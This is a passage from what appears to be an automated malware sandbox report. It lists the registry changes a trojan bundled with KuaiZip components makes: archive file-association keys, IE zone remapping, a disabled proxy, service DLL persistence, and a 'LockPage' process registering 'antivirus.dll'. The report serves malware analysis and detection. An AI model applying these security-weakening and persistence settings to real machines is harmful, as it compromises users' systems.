[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052\UserChoice]
"Progid"

The process %original file name%.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 97 38 C1 E3 EE 52 B2 C1 C2 DA FF 7B D4 41 0D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process net.exe:1864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 7F 6C EA 58 8F 2F FB 76 72 7B E6 4E 38 F1 3B"

The process regsvr32.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 EB 42 34 75 46 46 19 1E 27 0C 0A 78 DF 08 97"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "Ã¥Â¿Â«Ã¥Å½â€¹Ã¨Â½Â¯Ã¤Â»Â¶Ã¥Ââ€¡Ã§ÂºÂ§Ã¦Â£â‚¬Ã¦Å¸Â¥Ã¦Å“ÂÃ¥Å Â¡"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process regsvr32.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 07 07 3A 21 DC A7 0B 46 B7 92 BC 32 FB 47 3E"

The process regsvr32.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}]
"(Default)" = "KzShlobj Class"

[HKCR\KuaiZip.zip\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.PropertyExt\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"

[HKCR\QZipShell.DragDropMenu\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\QZipShell.KYDropHandler]
"(Default)" = "KYDropHandler Class"

[HKCR\QZipShell.ContextMenuExt.1]
"(Default)" = "ContextMenuExt Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"KuaiZip Shell Extension" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\ProgID]
"(Default)" = "QZipShell.KzShlobj.1"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\VersionIndependentProgID]
"(Default)" = "QZipShell.KYDropHandler"

[HKCR\QZipShell.ContextMenuExt]
"(Default)" = "ContextMenuExt Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}]
"(Default)" = "IKzShlobj"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\ProgID]
"(Default)" = "QZipShell.ContextMenuExt.1"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\QZipShell.KYDropHandler.1\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.DragDropMenu.1\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\ProgID]
"(Default)" = "QZipShell.PropertyExt.1"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\ProgID]
"(Default)" = "QZipShell.DragDropMenu.1"

[HKCR\QZipShell.KYDropHandler\CurVer]
"(Default)" = "QZipShell.KYDropHandler.1"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\VersionIndependentProgID]
"(Default)" = "QZipShell.KzShlobj"

[HKCR\Directory\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\*\shellex\ContextMenuHandlers\ContextMenuExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Folder\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\Drive\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}]
"(Default)" = "DragDropMenu Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\QZipShell.DragDropMenu.1]
"(Default)" = "DragDropMenu Class"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0]
"(Default)" = "QZipShell 1.0 Type Library"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\ProgID]
"(Default)" = "QZipShell.KYDropHandler.1"

[HKCR\QZipShell.KzShlobj\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}]
"(Default)" = "ContextMenuExt Class"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\QZipShell.DragDropMenu\CurVer]
"(Default)" = "QZipShell.DragDropMenu.1"

[HKCR\KuaiZip.kz\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.DragDropMenu]
"(Default)" = "DragDropMenu Class"

[HKCR\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}]
"(Default)" = "QZipShell"

[HKCR\QZipShell.ContextMenuExt.1\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\QZipShell.PropertyExt.1\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\0\win32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\QZipShell.ContextMenuExt\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\QZipShell.ContextMenuExt\CurVer]
"(Default)" = "QZipShell.ContextMenuExt.1"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll"

[HKCR\QZipShell.KYDropHandler\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}]
"(Default)" = "KYDropHandler Class"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6E AC 54 6F 36 AE D4 E7 53 A0 8E 17 48 C7 E8"

[HKCR\QZipShell.KzShlobj.1]
"(Default)" = "KzShlobj Class"

[HKCR\QZipShell.KYDropHandler.1]
"(Default)" = "KYDropHandler Class"

[HKCR\Directory\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\VersionIndependentProgID]
"(Default)" = "QZipShell.ContextMenuExt"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\VersionIndependentProgID]
"(Default)" = "QZipShell.DragDropMenu"

[HKCR\Drive\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\QZipShell.KzShlobj.1\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\QZipShell.KzShlobj\CurVer]
"(Default)" = "QZipShell.KzShlobj.1"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\VersionIndependentProgID]
"(Default)" = "QZipShell.PropertyExt"

[HKCR\QZipShell.KzShlobj]
"(Default)" = "KzShlobj Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\QZipShell.PropertyExt.1]
"(Default)" = "PropertyExt Class"

[HKCR\QZipShell.PropertyExt\CurVer]
"(Default)" = "QZipShell.PropertyExt.1"

[HKCR\QZipShell.PropertyExt]
"(Default)" = "PropertyExt Class"

[HKCR\*\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\AppID\QZipShell.DLL]
"AppID" = "{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}]
"(Default)" = "PropertyExt Class"

The process regsvr32.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 14 80 CD C9 2C 64 09 63 51 5B 6C 8E 64 51 22"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "Ã¥Â¿Â«Ã¥Å½â€¹Ã¨Â½Â¯Ã¤Â»Â¶Ã¥Ââ€¡Ã§ÂºÂ§Ã¦Â£â‚¬Ã¦Å¸Â¥Ã¦Å“ÂÃ¥Å Â¡"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process 2345pic_k1252705.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB B7 7A 31 C2 C9 85 4E 6A 3C 6C 2F E7 7B 5F EC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process LockPage.exe:1212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\ComputerName]
"Path" = "%Program Files%\Common Files\System\safe.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"DomainVer" = "1.0.0.2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"IdVer" = "1.0.0.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"MD5Ver" = "1.0.1.12"

[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\antivirus.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"Lock" = "1"

